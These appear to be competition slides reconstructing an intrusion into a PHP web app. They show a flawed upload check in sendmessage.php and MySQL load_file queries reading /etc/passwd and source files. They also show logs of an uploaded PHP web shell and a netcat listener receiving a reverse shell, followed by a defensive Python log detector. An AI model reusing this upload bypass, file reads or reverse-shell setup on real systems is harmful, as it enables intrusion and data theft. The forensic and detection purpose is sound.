Presented as team IPFactory
MBSD Cybersecurity Challenges 2018
sendmessage.php

$prefix = md5(time() . $user->id);
$tname = $prefix . basename($_FILES["file"]["name"]);
if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+\.jpg$/",$tname)) {
sendmessage.php (2018/9/21 14:46:48)

180921 14:39:24 26247 Connect [email protected] on mysql
180921 14:41:06 26247 Query select load_file('/etc/hosts')
180921 14:41:12 26247 Query select load_file('/etc/passwd')
180921 14:42:30 26247 Query select load_file('/etc/issue')
180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
Web Shell (2018/9/21 15:12:46)
192.168.11.2 >> 7449f92ea0f26445e89ae968227efaabtest.php

[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1

192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
(2018/9/21 15:29:02)
192.168.11.2>
Listening on 4444/TCP…

$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 192.168.11.204 64495 received!
sh-4.1$

192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
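
Added example, not part of the original slides: a Python check for the pattern visible in the access logs above, a successful request for a script file inside the upload directory, paired with the same client's preceding POST to sendmessage.php. The function names, the extension list and the 192.168.11.50 log line are assumptions made for this illustration.

```python
import re
from datetime import datetime

# Apache combined-format prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
UPLOAD_DIR = "/tmp/"                   # upload directory used by sendmessage.php
UPLOAD_ENDPOINT = "/sendmessage.php"   # upload handler named on the slides
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)  # assumed list

# Access-log lines from the slides (user agent shortened), plus one
# constructed benign image request from a constructed client address.
SAMPLE_LOG = """\
192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0"
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
192.168.11.50 - - [21/Sep/2018:15:20:00 +0900] "GET /tmp/0123456789abcdefphoto.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
"""

def parse(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec.pop("ts"), "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]   # ignore the query string
    return rec

def find_uploaded_script_hits(log_text):
    """Flag successful requests for script files inside the upload directory
    and attach the same client's most recent earlier upload POST, if any."""
    records = sorted(filter(None, map(parse, log_text.splitlines())),
                     key=lambda r: r["time"])
    last_upload, findings = {}, []
    for r in records:
        if r["method"] == "POST" and r["path"] == UPLOAD_ENDPOINT:
            last_upload[r["client"]] = r["time"]
        elif (r["path"].startswith(UPLOAD_DIR) and SCRIPT_EXT.search(r["path"])
              and r["status"].startswith("2")):
            findings.append({**r, "upload_time": last_upload.get(r["client"])})
    return findings

if __name__ == "__main__":
    for f in find_uploaded_script_hits(SAMPLE_LOG):
        print(f["time"], f["client"], f["method"], f["path"],
              "uploaded:", f["upload_time"])
```

A hit with `upload_time` set to `None` means the script was requested without a logged upload from that client, which is worth checking against older log files.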